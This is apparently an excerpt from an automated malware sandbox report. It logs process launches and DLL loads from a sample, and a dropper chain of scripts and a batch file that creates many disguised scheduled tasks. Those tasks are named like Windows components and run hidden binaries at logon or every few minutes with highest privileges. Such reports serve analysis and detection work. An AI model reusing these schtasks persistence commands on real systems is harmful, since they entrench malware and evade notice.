            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Memory Compression" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Users\Public\Desktop\spoolsv.exe C:\Users\Public\Desktop\spoolsv.exe
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\Memory Compression.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Users\Public\Desktop\spoolsv.exe C:\Users\Public\Desktop\spoolsv.exe
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Recovery\ShellExperienceHost.exe'" /f
            Source: unknownProcess created: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\ShellExperienceHost.exe'" /rl HIGHEST /f
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Recovery\ShellExperienceHost.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 6 /tr "'C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows portable devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Program Files (x86)\windows portable devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows portable devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\RuntimeBroker.exe'" /f
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 9 /tr "'C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 13 /tr "'C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\k6u1xEDPWjfrPQve79LV.vbe" Jump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Intodhcp\file.vbs" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Intodhcp\zSeea0nqF8D7gTEAJAxS8lBZw.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe "C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\5U9CuGu1ru.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Intodhcp\containerdll.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: mscoree.dll
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: version.dll
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: uxtheme.dll
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: windows.storage.dll
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: wldp.dll
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: profapi.dll
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: cryptsp.dll
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: rsaenh.dll
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: cryptbase.dll
            Source: C:\Users\Public\Desktop\spoolsv.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: mscoree.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: apphelp.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: kernel.appcore.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: version.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: uxtheme.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: windows.storage.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: wldp.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: profapi.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: cryptsp.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: rsaenh.dll
            Source: C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exeSection loaded: cryptbase.dll
